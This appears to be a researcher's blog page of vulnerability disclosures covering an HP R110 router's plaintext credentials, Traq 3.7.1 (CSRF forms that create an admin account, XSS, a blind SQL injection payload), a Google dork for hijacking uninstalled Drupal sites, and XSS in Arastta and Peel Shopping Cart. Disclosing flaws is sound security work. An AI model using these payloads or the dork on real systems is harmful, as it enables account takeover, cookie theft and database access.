HP R110 Wireless 11n VPN AM Router Credential exposure.

I had recently purchased a HP R110 Wireless 11n VPN AM Router (Product No: J9974A).

223867

I had noticed that it by default communicates via http instead of https, the reason this is an issue is that every single request the user sends after logging in is sent with the login and password in  get/post requests to the router.

img_20181206_181635.jpg

I apologize for the bad “screenshot” phone camera photo.

The ‘username=admin; password=admin’  shows up in every request after login.  I used the default credentials in this example so that i didn’t give my own away.
This might not seem like a big deal but anyone sniffing the network could obtain these credentials.

Traq 3.7.1 multiple vulnerabilities.

=================================================

Synopsis: Traq vulnerable to XSS, Admin account creation CSRF, SQL Injection, Lack of session timeout.

CVE:CVE-2018-20780
Product: Traq
Version: 3.7.1
Vendor site: https://traq.io/
Researcher: Matt Landers
matt@mjlanders.com
twitter.com/matthewjland
https://mjlanders.org/

=================================================

1: Username enumeration via
http://example.com/home/example/public_html/traq/users/1 = admin
http://example.com/home/example/public_html/traq/users/2 = anonymous
http://example.com/home/example/public_html/traq/users/3 = user etc etc

2: Reflected XSS
A GET reflected XSS appears in the search parameter of the following request.
https://example.com/traq/tickets?search=”>alert(document.domain)

3: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the email parameter in the following request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/usercp&#8221; method=”POST”>
<input type=”hidden” name=”name” value=”Administrator” />
<input type=”hidden” name=”email” value=”tt1kr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;awezh” />
<input type=”hidden” name=”watch_created_tickets” value=”1″ />
<input type=”hidden” name=”locale” value=”enus” />
<input type=”hidden” name=”submit” value=”Save” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

4: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the name and email parameter in the following request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/admin/users/new?overlay=true&#8221; method=”POST”>
<input type=”hidden” name=”username” value=”user1″ />
<input type=”hidden” name=”name” value=”guyj&quot;&gt;&lt;img src=a onerror=alert(document.domain)&gt;mztcr” />
<input type=”hidden” name=”password” value=”userpass” />
<input type=”hidden” name=”email” value=”test@testy2.comlgfyr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;jj194″ />
<input type=”hidden” name=”group_id” value=”2″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

5: Admin user creation via CSRF in the same request as the above mentioned item 4. The xss could be used to notify the attacker when the admin triggers the csrf, the admin account is created by setting the group id to 1 in this request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/admin/users/new?overlay=true&#8221; method=”POST”>
<input type=”hidden” name=”username” value=”testadmin” />
<input type=”hidden” name=”name” value=”guy smiley” />
<input type=”hidden” name=”password” value=”testadmin” />
<input type=”hidden” name=”email” value=”testadmin@evil.com” />
<input type=”hidden” name=”group_id” value=”1″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

6: SQL Injection via the search parameter, I was able to have sqlmap return with the database current user and database type. The following is the sql injection I used in order to achieve this.

Parameter: search (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://example.com:80/home/example/public_html/traq/dfgdfg/tickets?search=&#8217;) RLIKE (SELECT (CASE WHEN (6383=6383) THEN ” ELSE 0x28 END)) AND (‘yDch’=’yDch&order_by=component.asc

(@DamianEbelties): https://twitter.com/DamianEbelties

Sent this cleaned up payload, thanks!

“%%27)%20and%20updatexml(null,concat(0x0a,version()),null)–%20-”

7: There appears to be no session timeout, admin account stayed logged in for two days.

Drupal takeover

Google dork for populated but not installed versions of Drupal

inurl:install.php select an installation profile

negative intext result: drupal already installed
positive intext result: select an installation profile

If Drupal is populated but not installed, you can install Drupal and become admin.

Arastta 1.6.2 XSS Disclosure

Synopsis: Arastta 1.6.2 xss vulnerability
Product: Arastta eCommerce: Free Shopping Cart
Version: 1.6.2
Researcher: Matt Landers
mattjoeland@gmail.com
twitter.com/matthewjland
https://mjlanders.org/

The xss that I have found is fairly straight forward.

http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace 'inserthostnamehere.com' with the server you would like to test.

 

Peel Shopping Cart 9.0.0 csrf/xss disclosure.

Description: Peel Shopping Cart is prone to various CSRF and XSS vulnerabilities.
The csrf example below opens two tabs. The first tab adds an item to the users cart
and the second tab modifies the attributes of that item showing a Post XSS.

Also the XSS appears to be persistant as long as the modified cart item, remains in the cart.

Here is a link to a poc, obviously replace all hostnames with the host you would like to test.
Packetstormsecurity.com